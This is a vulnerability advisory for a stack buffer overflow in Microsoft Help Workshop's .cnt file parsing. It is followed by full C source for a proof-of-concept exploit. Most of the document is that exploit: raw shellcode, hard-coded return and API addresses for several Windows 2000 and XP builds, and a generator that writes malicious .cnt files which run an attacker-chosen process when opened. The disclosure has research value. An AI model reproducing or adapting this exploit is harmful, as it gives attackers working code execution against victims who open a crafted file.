cnt-exploit.txt

`Description:  
  
There is a stack based memory corruption in Microsoft Help Workshop  
while processing .CNT Help Contents files,   
The tool is standard component of Microsoft Visual Studio 6.0 and 2003 (.NET)  
for building and managing help projects  
and could be also downloaded alone from the Microsoft download center.  
  
  
Affected vendor:  
  
Microsoft  
  
  
Impact:  
  
Remote code execution  
  
  
Attack vector:  
  
An attacker must construct malformed .cnt file and induce victim to  
open it with the tool, or if Help Workshop has been launched  
in the past (after first launch it associates the .cnt files with itself),  
to launch the malicious file by doubleclicking/selecting for editing.  
  
  
Technical Details:  
  
The stack based buffer overflow occurs in Microsoft Help Workshop  
while processing .cnt files.Each potentialy vulnerable line is   
constructed with the "%d %s" format ,  
example:  
  
1 SomeContentsDescription  
  
and placed by the program before processing in the static  
buffer, which overflows itself because of lack of input data boundary  
check.  
When the overflow occurs, the EIP register value is set to the DWORD value  
placed 526 bytes counting from the beginning of 'SomeContentsDescription' string.  
The ESP is set to DWORD value placed 534 bytes counting from the beggining of   
the string.  
The process control can be therefore intercepted by the attacker by   
redirecting the instruction flow to the attackers provided code within the .cnt file.  
  
  
Vulnerable software:  
  
Microsoft Help Workshop v4.03.0002  
Microsoft Visual Studio 6.0 SP6  
Microsoft Visual Studio 2003 (.Net)  
  
  
  
Exploit:  
  
Proof of Concept exploit has been included at the end of the advisory.  
After compiled, it will produce .cnt exploit files that   
after succesfull exploitation should spawn user specified process   
(by default notepad.exe), in the user specified OS enviroment.  
The exploit can be also found at:  
www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpp  
  
  
Credits:  
  
Vulnerability discovered and researched by: porkythepig  
Exploit by: porkythepig  
[email protected]  
  
  
  
  
  
  
  
  
  
  
/////////////////////////////////////////////////////////////  
//*****************  
//  
// PoC exploit for .cnt files buffer overflow vulnerability in   
// Microsoft Help Workshop v4.03.0002  
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)  
//  
// vulnerability found / exploit built by porkythepig  
//  
//*****************  
  
#include "stdio.h"  
#include "stdlib.h"  
#include "string.h"  
#include "memory.h"  
  
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "  
#define DEF_SPAWNED_PROCESS "notepad.exe"  
#define EXPL_SIZE 619  
#define PROC_NAM_SIZ 66  
#define RET_OFFSET 0x210  
#define PROC_NAME_OFFSET 0x228  
#define BACK_SEQ_OFFSET 0x218  
#define EXPRO_OFFSET 0xbf  
#define GETSTAR_OFFSET 0x4a  
#define CREPRO_OFFSET 0xb5  
#define GETWINDIR_OFFSET 0x65  
  
typedef struct  
{  
unsigned int extPro;  
unsigned int getStarInf;  
unsigned int crePro;  
unsigned int getWinDir;  
unsigned int jmpEspPtr;  
}ApiPtrs;  
  
ApiPtrs osApiPtrs[5]=  
{  
0x793f69da,0x793f6b7a,0x793f5010,0x793f2d23,0x7cfdbd1b,   
0x7c4ee01a,0x7c4f49df,0x7c4fc0a0,0x7c4e9cFF,0x784452e4,   
0x7c5969da,0x7c596b7a,0x7c595010,0x7c592d23,0x7d0812e4,   
0x7c81cdda,0x7c801eee,0x7c802367,0x7c821363,0x7cc58fd8,   
0x77e75cb5,0x77e6177a,0x77e61bb8,0x77e705b0,0x775e6247   
};  
  
unsigned char shlCode[]=  
{  
0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,  
0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,  
0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,  
0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,  
0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,  
0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,  
0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,  
0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,  
0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,  
0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,  
0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,  
0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,  
0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,  
0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,  
0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,  
0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,  
0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,  
0x69,0x3f,0x79,0xff,0xd0  
};  
  
unsigned char backSeq[]=  
{   
0xe9,0x1b,0xfe,0xff,0xff   
};  
  
char buf0[EXPL_SIZE];  
char spawnProcess[PROC_NAM_SIZ];  
char *outName;  
int osId;  
int defProc;  
  
void CompileBuffer()  
{  
int ptr=0;  
  
memset(buf0,'1',EXPL_SIZE);  
ptr+=sprintf(buf0,"%s",STR01);  
memcpy(buf0+ptr,shlCode,sizeof(shlCode));  
memcpy(buf0+BACK_SEQ_OFFSET,backSeq,sizeof(backSeq));  
  
*((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;  
*((unsigned int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;  
*((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;  
*((unsigned int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;  
*((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;  
  
ptr=PROC_NAME_OFFSET;  
if(!defProc)  
{  
buf0[ptr]=32;  
ptr++;  
}  
sprintf(buf0+ptr,"%s",spawnProcess);  
  
printf("Exploit buffer compiled\n");  
}  
  
void WriteBuffer()  
{  
FILE *o;  
  
o=fopen(outName,"wb");  
if(o==NULL)  
{  
printf("Cannot open file for writing\n");  
exit(0);  
}  
  
fwrite(buf0,EXPL_SIZE,1,o);  
fclose(o);  
  
printf("Output .cnt file [ %s ] built successfully\n",outName);  
}  
  
void ProcessInput(int argc, char* argv[])  
{  
printf("\nMicrosoft Help Workshop 4.03.0002 .cnt files exploit\n");  
printf("Vulnerability found & exploit built by porkythepig\n");  
  
if(argc<3)  
{  
printf("Syntax: exploit.exe os outName [spawnProc]\n");  
printf("[ os ] host OS, possible choices:\n");  
printf(" 0 Windows 2000 SP4 [Polish] updates on 11.01.2007\n");   
printf(" 1 Windows 2000 SP4 [English]\n");   
printf(" 2 Windows 2000 SP4 [English] updates on 11.01.2007\n");  
printf(" 3 Windows XP Pro SP2 [English] updates on 11.01.2007\n");  
printf(" 4 Windows XP Pro [English]\n");  
printf("[ outName ] output .cnt exploit file name\n");  
printf("[ spawnProc ] *optional* full path to the process to be spawned by\n");  
printf(" the exploit (if none specified default will be notepad.exe)\n");  
exit(0);  
}  
  
osId=atol(argv[1]);  
if((osId<0)||(osId>4))  
{  
exit(0);  
}  
  
outName=argv[2];  
  
if(argc>3)  
{  
if(strlen(argv[3])>=PROC_NAM_SIZ)   
{  
exit(0);  
}  
strcpy(spawnProcess,argv[3]);  
defProc=0;  
}  
else  
{  
strcpy(spawnProcess,DEF_SPAWNED_PROCESS);  
defProc=1;  
}  
}  
  
int main(int argc, char* argv[])  
{  
  
ProcessInput(argc,argv);  
CompileBuffer();  
WriteBuffer();  
  
return 0;  
}  
`